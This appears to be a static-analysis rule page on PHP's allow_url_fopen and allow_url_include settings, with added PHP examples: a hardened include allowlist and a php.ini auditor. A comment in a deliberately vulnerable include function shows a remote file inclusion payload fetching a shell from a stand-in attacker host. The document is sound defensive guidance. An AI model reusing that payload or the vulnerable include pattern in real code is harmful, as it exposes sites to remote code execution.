allow_url_fopen and allow_url_include allow a script to read data, and in the case of allow_url_include executable code, from URLs (allow_url_include also requires allow_url_fopen to be on). The ability to suck executable code in from outside your site, coupled with imperfect input cleansing, could lay your site bare to attackers through remote file inclusion. Even if your input filtering is perfect today, are you prepared to bet your site that it will always be perfect in the future?
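What that risk looks like in code, as an added example that is not part of the rule page: the classic remote file inclusion pattern beside a hardened replacement that maps the request parameter to a fixed set of local files and refuses to run at all when URL includes are enabled. The `page` parameter, the `templates` directory and the page names are assumptions made for the illustration.

```php
<?php
// Added example (not SonarSource's code): remote file inclusion via include()
// and a hardened replacement. $_GET['page'], TEMPLATE_DIR and the PAGES map
// are illustrative assumptions.
declare(strict_types=1);

// VULNERABLE: with allow_url_include=1 (which also needs allow_url_fopen=1),
// ?page=http://attacker.example/shell.txt makes PHP fetch and execute
// attacker-controlled code. Even with URL includes off, ../ traversal and
// php:// wrappers remain, so never build an include path from request input.
function render_page_vulnerable(string $page): void
{
    include $page;             // e.g. $_GET['page']
}

// HARDENED: the user-supplied key selects an entry in a fixed allowlist, so no
// part of the include path comes from the request. The ini check is defence in
// depth on top of the php.ini setting: refuse to include anything if URL
// includes are enabled in this interpreter.
const TEMPLATE_DIR = __DIR__ . '/templates';   // assumption
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function ini_flag(string $name): bool
{
    // ini_get() returns strings such as "1", "0", "On", "Off" or "" (and false
    // for an unknown directive); FILTER_VALIDATE_BOOLEAN normalises all of them
    return filter_var((string) ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

function resolve_page(string $page): ?string
{
    if (ini_flag('allow_url_include')) {
        throw new RuntimeException('allow_url_include is enabled; refusing to include anything');
    }
    if (!array_key_exists($page, PAGES)) {
        return null;    // unknown key: caller answers 404 instead of including
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . PAGES[$page]);
    // realpath() resolves symlinks and ../ ; make sure the result is still under TEMPLATE_DIR
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $path;
}

// Usage (the request parameter name is an assumption):
// render_page($_GET['page'] ?? 'home');
```

The allowlist is what actually removes the injection; the `ini_flag('allow_url_include')` guard exists so that a later php.ini regression is caught loudly at runtime rather than silently reopening the hole.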
This rule raises an issue when either directive is explicitly enabled in php.ini, and also when allow_url_fopen, which defaults to enabled, is not explicitly disabled.
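The rule's two conditions applied to php.ini text, as an added example and not SonarSource's own implementation: allow_url_include is an issue only when explicitly enabled (its built-in default is off), while allow_url_fopen is an issue when explicitly enabled or simply absent, because PHP's built-in default is on. The same check is then run against the interpreter executing the script. The two php.ini fragments are constructed for the demonstration.

```php
<?php
// Added example (not SonarSource's implementation): the rule's conditions
// applied to php.ini text, plus the same check against the running interpreter.
declare(strict_types=1);

function ini_truthy(?string $value): bool
{
    // php.ini accepts 1/On/True/Yes and 0/Off/False/No/None/""; parse_ini_string()
    // in normal scanner mode already turns On/True/Yes into "1" and
    // Off/False/No/None into "", and FILTER_VALIDATE_BOOLEAN handles the rest.
    return filter_var((string) $value, FILTER_VALIDATE_BOOLEAN);
}

// Returns a list of findings; an empty list means the directives are compliant.
function audit_directives(array $directives): array
{
    $findings = [];
    if (array_key_exists('allow_url_include', $directives)
        && ini_truthy($directives['allow_url_include'])) {
        $findings[] = 'allow_url_include is explicitly enabled';
    }
    if (!array_key_exists('allow_url_fopen', $directives)) {
        $findings[] = 'allow_url_fopen is not explicitly disabled (PHP default is enabled)';
    } elseif (ini_truthy($directives['allow_url_fopen'])) {
        $findings[] = 'allow_url_fopen is explicitly enabled';
    }
    return $findings;
}

function audit_ini_text(string $text): array
{
    $parsed = parse_ini_string($text, false);   // flat array, sections ignored
    if ($parsed === false) {
        throw new InvalidArgumentException('unparseable php.ini text');
    }
    return audit_directives($parsed);
}

function audit_running_interpreter(): array
{
    // ini_get() returns false for an unknown directive; treat that as "absent"
    $directives = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $name) {
        $value = ini_get($name);
        if ($value !== false) {
            $directives[$name] = $value;
        }
    }
    return audit_directives($directives);
}

// Constructed php.ini fragments for the demonstration
$noncompliant = <<<'INI'
; allow_url_fopen left at its default
allow_url_include = On
INI;

$compliant = <<<'INI'
allow_url_fopen = Off
allow_url_include = 0
INI;

foreach (['noncompliant' => $noncompliant, 'compliant' => $compliant] as $label => $ini) {
    $findings = audit_ini_text($ini);
    echo $label, ': ', $findings ? implode('; ', $findings) : 'no issues', PHP_EOL;
}
echo 'running interpreter: ', implode('; ', audit_running_interpreter()) ?: 'no issues', PHP_EOL;
```

The "absent" case is the one that is easy to miss in a hand audit: a php.ini that never mentions allow_url_fopen is noncompliant, because PHP supplies the enabled default. Note that `audit_running_interpreter()` reports the effective value, which may come from php.ini, a `.user.ini`, an Apache `php_admin_value` or a container's `PHP_INI_*` mechanism, so it is the more reliable of the two checks for a deployed system.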
Noncompliant Code Example
; php.ini
; Noncompliant; allow_url_fopen not explicitly disabled
allow_url_include=1 ; Noncompliant
Compliant Solution
; php.ini
allow_url_fopen=0
allow_url_include=0
See